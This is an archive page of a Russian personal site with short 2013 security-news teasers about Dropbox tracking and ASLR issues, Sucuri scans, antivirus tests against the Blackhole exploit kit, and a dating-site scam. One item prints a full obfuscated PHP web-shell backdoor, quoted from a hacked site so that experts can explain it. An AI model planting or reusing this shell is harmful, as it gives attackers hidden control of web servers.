Vayrus Home Page Вторник, 30.04.2024, 05:12
Главная | Регистрация | Вход Приветствую Вас Гость | RSS
Меню сайта

Мини-чат

Главная » Архив материалов

Это карта, на которую по состоянию на лето 2013 года нанесена статистика наиболее частых посещений сайтов в тех или иных странах, полученная от известного сетевого измерителя Alexa. Как мы видим ниже — доминирует Google, имеющая и максимум пользователей, причём живущих в наиболее состоятельных странах Европы и Северной Америки. На втором месте по территориальному охвату — Facebook, но по числу пользователей она уступает доминирующей на пространствах Поднебесной Baidu. (Интересное наблюдение — национальный китаец преобладает и на очень важном рынке Южной Кореи!) На постсоветском пространстве Казахстан любит Mail.Ru, а братская Белоруссия — «ВКонтакте». А на родных просторах первое место занимает Яndex.
Просмотров: 570 | Добавил: vayrus | Дата: 08.10.2013

Не секрет, что в документы MS Office или PDF можно вставить специальные следящие скрипты для проверки, с какого IP открыли файл, в какое время и т.д. Такими средствами давно пользуются маркетологи. Каждый раз при открытии файла документ отправляет GET-запрос на удаленный сервер, где регистрируется это событие. Среди прочих, возможность внедрения следящих скриптов предлагает сервис HoneyDocs.

Один из пользователей HoneyDocs внедрил скрипт в файл passwords.doc — и закачал его в свою личную папку Dropbox. Каково же было его удивление, когда через 10 минут на сервере появилось сообщение, что файл открыт. Ведь он еще ни с кем не делился ссылкой, да и вообще закачал файл в персональную папку, к которой запрещен посторонний доступ.

Пользователь продолжил свой эксперимент. Он удалил файл и закачал его повторно. В этот раз посторонних посещений не было, но они были ... Читать дальше »

Просмотров: 557 | Добавил: vayrus | Дата: 17.09.2013

Специалист по безопасности и пользователь программы Dropbox Грэм Сазерленд (Graham Sutherland) обнаружил уязвимость в клиентском приложении Dropbox под Windows (32 бит).

128-килобайтная библиотека DropboxExt19.dll загружается в память, внедряясь в различные процессы, чтобы обеспечить контекстную функциональность, в том числе вызываемую по щелчку правой кнопки мыши.

Среди прочего, она внедряется также в firefox.exe и другие процессы.

Но самое интересное, что эта библиотека не использует технологию рандомизации памяти ASLR (Address space layout randomization).

ASLR — один из главных механизмов защиты операционной системы Windows от запуска различных эксплойтов, в том числе с переполнением буфера. Как показывает практика с последними браузерным ... Читать дальше »

Просмотров: 632 | Добавил: vayrus | Дата: 17.09.2013

Компания Sucuri осуществила проверку миллиона крупнейших сайтов интернета (по версии Alexa) на предмет уязвимостей, устаревшего серверного ПО и зловредов. Результаты плачевны.

Из миллиона сайтов 108 781 признаны небезопасными, а 18 557 из них уже внесены в черные списки антивирусных компаний и поисковых систем. На диаграмме можно увидеть, что самая большая в мире база зараженных сайтов — у McAffee, на втором месте Sucuri Labs, а на третьем — российский «Яндекс», далее следуют Norton, ESET и Google. База вредоносных сайтов «Яндекса» по этой выборке примерно в шесть раз полнее, чем у Google: 2154 штуки против 357.

Еще 4836 сайтов из миллиона заражены поисковым спамом — самым популярным методом инъекций.

Пугающе много сайтов (67 509) работают под устаревшим и уя ... Читать дальше »

Просмотров: 554 | Добавил: vayrus | Дата: 17.09.2013

Администратор одного из веб-сайтов жалуется, что его сайт подвергся взлому. Он обнаружил PHP-шелл, в коде которого не было ни одной буквы или цифры.

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Админ просит объяснить, что это такое. Специалисты компании Sucuri объясняют, что суть бэкдоров в максимальной скрытности, поэтому их авторы часто прибегают к необычным методам обфускации. Например, первая строчка @$_[] ... Читать дальше »

Просмотров: 677 | Добавил: vayrus | Дата: 17.09.2013

Внедряемся в святая святых системы минуя стандартные механизмы

Сегодня мы попробуем залезть в реестр Windows с черного хода, без использования штатных WinAPI-функций, для этого предназначенных. Что нам это даст в итоге? Возможность писать и читать из реестра напрямую, в обход ограничений, установленных разработчиками антивирусных решений!

Забегая вперед, отмечу: тема эта интересна, но тут целый набор серьезных проблем. Хотя кто сказал, что нам это не по плечу? :)

Что такое реестр, или немного лирики

С точки зрения операционной системы Windows, реестр — это уникальная кладовка. В этой своеобразно выстроенной иерархической базе данных хранятся настройки, данные, регистрационная информация и прочая хрень почти обо всем в системе, начиная с программ и заканчивая настройками конкретного пользователя. В реестре хранится практически все. Несмотря на то что некоторые программы предпочитают хранить свои настройки в ini-кон ... Читать дальше »

Просмотров: 672 | Добавил: vayrus | Дата: 28.08.2013

Эксплуатация уязвимостей в программном обеспечении на стороне конечного пользователя стала одним из основных трендов на черном рынке. Аналитические компании прогнозируют стабильный рост доходов киберпреступников от услуг предоставления средств компрометации. Взглянем на антивирусную защиту с позиции обладателя топовой связки сплоитов.

Для тех, кто не осилил: краткое содержание

Мы арендовали новейший Blackhole (пришлось тряхнуть мошной, но чего не сделаешь ради науки), установили новейшие версии топовых антивирусов и проверили, кто из них чего стоит в деле борьбы с новейшими эксплойтами. Благодаря тому, что в наших руках оказалась и консоль эксплойт-пака, и рабочая машина с антивирусом, мы смогли оценить антиэксплойт-эффективность абсолютно достоверно. А еще мы сняли про все это дело видео. Короче, читай, не ленись!

Методика тестирования

В числе топовых на черном рынке эксплойт-паков сейчас находит ... Читать дальше »

Просмотров: 667 | Добавил: vayrus | Дата: 09.08.2013

Ученые из Калифорнийского университета в Лос-Анджелесе разработали новый механизм обфускации кода, основанный на функциональном шифровании, который должен надежно защитить исходный код программ от попыток реверс-инжиниринга. «Вы пишете программный код в нормальном, понятном, читаемом виде, а затем загружаете его в нашу систему, — объясняет профессор Амат Сахаи (Amat Sahai), один из авторов научной работы. — На выходе получается математически измененный образец программного обеспечения, который эквивалентен по функциональности, но если посмотреть на него, вы не сможете догадаться, что он делает».

Сахаи с коллегами уверяют: впервые техника обфускации позволяет добиться столь надежн ... Читать дальше »

Просмотров: 634 | Добавил: vayrus | Дата: 09.08.2013

И почему эти сайты такие сложные и суперзасекреченные – для того, чтобы хотя бы одним глазочком взглянуть, что они собой представляют, посмотреть действительно ли там есть девочки из твоего города нужно обязательно пройти процедуру платной регистрации, почему? Практически на всех сайтах интимных знакомств мы можем увидеть только главную страницу и эти главные страницы создают впечатление настоящего рая – сотни развратных фотографий не менее развратных и в то же время красивых девочек, которые очень сильно хотят секса прямо сейчас!

Потому что все очень-очень просто! Все сайты интимных знакомств – это новая популярная разновидность лохотрона, новый метод зарабатывания денег на человеческих слабостях.

Как обманывают доверчивых мужчин?

ЛОХОТРОН!Х ... Читать дальше »

Просмотров: 1394 | Добавил: vayrus | Дата: 13.05.2013

Компания «Лаборатория Касперского» анонсировала, как утверждается, первый и единственный в мире антивирусный продукт, совместимый с UEFI.


Евгений Касперский, глава «Лаборатории Касперского» (март 2012 года; фото Peter Hauser / Demotix / Corbis).
Евгений Касперский, глава «Лаборатории Касперского» (март 2012 года; фото Peter Hauser / Demotix / Corbis).


Напомним, UEFI — это интерфейс между операционной системой и микропрограммами, управляющими низкоуровневыми функциями оборудования. Основно ... Читать дальше »
Просмотров: 677 | Добавил: vayrus | Дата: 16.04.2013

« 1 2 3 4 5 6 7 ... 52 53 »
Форма входа

Календарь новостей
«  Апрель 2024  »
ПнВтСрЧтПтСбВс
1234567
891011121314
15161718192021
22232425262728
2930

Поиск

Друзья сайта

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

Copyright ArtStudio Software © 2024 Конструктор сайтов - uCoz -->